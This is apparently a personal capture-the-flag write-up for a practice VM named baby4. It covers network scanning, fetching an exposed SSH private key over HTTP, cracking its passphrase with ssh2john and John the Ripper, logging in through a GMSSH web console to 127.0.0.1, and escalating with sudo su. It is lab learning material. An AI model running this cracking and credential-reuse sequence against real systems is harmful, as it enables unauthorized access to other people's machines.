
Group member's target machine: baby4

Information gathering

┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::20c:29ff:fe66:2ae1 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:66:2a:e1 txqueuelen 1000 (Ethernet)
RX packets 5 bytes 1543 (1.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 30 bytes 3784 (3.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:c9:f2:ac (Unknown)
192.168.56.112 08:00:27:e0:b9:48 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.892 seconds (135.31 hosts/sec). 3 responded

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.112
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-19 13:06 +08
Nmap scan report for 192.168.56.112
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: SSH Private Key
|_http-server-header: Apache/2.4.62 (Debian)
8080/tcp open http Golang net/http server
| http-title: GMSSH
|_Requested resource was /web/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: *
| Access-Control-Allow-Methods: *
| Access-Control-Allow-Origin: *
| Content-Type: text/plain
| Date: Sun, 19 Oct 2025 05:07:02 GMT
| Content-Length: 18
| page not found
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 301 Moved Permanently
| Access-Control-Allow-Headers: *
| Access-Control-Allow-Methods: *
| Access-Control-Allow-Origin: *
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Sun, 19 Oct 2025 05:07:01 GMT
| Content-Length: 39
| href="/web">Moved Permanently</a>.
| HTTPOptions:
| HTTP/1.0 204 No Content
| Access-Control-Allow-Headers: *
| Access-Control-Allow-Methods: *
| Access-Control-Allow-Origin: *
|_ Date: Sun, 19 Oct 2025 05:07:02 GMT
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:E0:B9:48 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.06 seconds

┌──(root㉿kali)-[/home/kali]
└─# curl -i http://192.168.56.112/
HTTP/1.1 200 OK
Date: Sun, 19 Oct 2025 05:08:55 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Sun, 19 Oct 2025 03:49:08 GMT
ETag: "628-6417ad954b9f7"
Accept-Ranges: bytes
Content-Length: 1576
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SSH Private Key</title>
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
background-color: #f8f9fa;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
color: #333;
}
.container {
text-align: center;
padding: 2rem;
background: white;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
max-width: 90%;
}
h1 {
font-weight: 400;
margin-bottom: 1.5rem;
font-size: 1.8rem;
}
.download-link {
display: inline-block;
padding: 0.8rem 1.5rem;
background-color: #007bff;
color: white;
text-decoration: none;
border-radius: 4px;
transition: background-color 0.2s;
font-size: 1.1rem;
}
.download-link:hover {
background-color: #0069d9;
}
</style>
</head>
<body>
<div class="container">
<h1>This is your SSH private key</h1>
<a href="id_rsa" class="download-link">Your Private Key</a>
</div>
<!-- Dont over think. the things you see is all -->
</body>
</html>

┌──(root㉿kali)-[/home/kali]
└─# curl -i http://192.168.56.112:8080/
HTTP/1.1 301 Moved Permanently
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Location: /web
Date: Sun, 19 Oct 2025 05:09:24 GMT
Content-Length: 39

<a href="/web">Moved Permanently</a>.

The web page on port 80 says there is an RSA key.
Port 22 is not open, so what is the point of giving me an SSH key?

First, visit port 80 and get the key.

-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----

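Next, visit port 8080. It turns out to be something called GMSSH, which is currently open source on GitHub, so go and look at how it is used:
https://github.com/GMSSH/GMSSH

My guess is that this thing is used in place of a direct SSH connection.

Note that this is a private key, and it is probably protected.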

┌──(root㉿kali)-[/home/kali]
└─# curl -sS http://192.168.56.112/id_rsa -o id_rsa

┌──(root㉿kali)-[/home/kali]
└─# ls
5.txt five.txt hydra.restore id_rsa url_encode.py 下载 公共 图片 文档 桌面 模板 视频 音乐

┌──(root㉿kali)-[/home/kali]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----

┌──(root㉿kali)-[/home/kali]
└─# chmod 600 id_rsa

┌──(root㉿kali)-[/home/kali]
└─# file id_rsa
id_rsa: OpenSSH private key

┌──(root㉿kali)-[/home/kali]
└─# chmod 644 id_rsa

┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -y -f id_rsa > id_rsa.pub 2>/dev/null && echo ">>> unencrypted, pub saved: id_rsa.pub" || echo ">>> private key may be passphrase-protected"
>>> private key may be passphrase-protected

The check shows it is indeed protected, so brute-force the passphrase.

┌──(root㉿kali)-[/home/kali]
└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[/home/kali]
└─# ls
5.txt five.txt hydra.restore id_rsa id_rsa.hash url_encode.py 下载 公共 图片 文档 桌面 模板 视频 音乐

┌──(root㉿kali)-[/home/kali]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cocacola (id_rsa)
1g 0:00:00:10 DONE (2025-10-19 13:43) 0.09891g/s 47.47p/s 47.47c/s 47.47C/s lover..marie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

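At the same time I handed it to an AI, which recovered the public key, and from that I got the username.

With cocacola in hand, we try logging in with the SSH certificate (the private key).

It turns out there is no SSH service for us to log in to at all. Now I was stuck: I could not get into GMSSH at all.

I suspected a bug, but did not dare ask the group owner; if that turned out not to be the problem, I would probably get scolded to death.

After I asked the group owner, he said there was nothing wrong, but I still could not solve it, so I later read the writeup.

I was stuck mainly on two points:

  1. The group owner said: having a channel for SSH key login does not mean I allow you to log in with the key.

So I had this box wrong from the start: the login uses cocacola.

  2. I did not know I had to connect to 127.0.0.1.

I kept trying the target's address, 192.168.56.112.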

user flag

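As for why the connection has to go to 127.0.0.1, this was really too stupid (of me).

The GMSSH service runs on the target machine itself, so when we use the target's GMSSH service to SSH to the target's local address, are we not simply connecting to the target itself? Looking back, I really was dense at the time. Connecting to 127.0.0.1 achieves exactly what we were after.

Alternatively, I could log in to the target directly: I have both the account and the password, so I can just log in.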

root flag

Check sudo -l.

It shows that user laoge already has full sudo privileges on the host Baby4.

So just run sudo su, and we are done.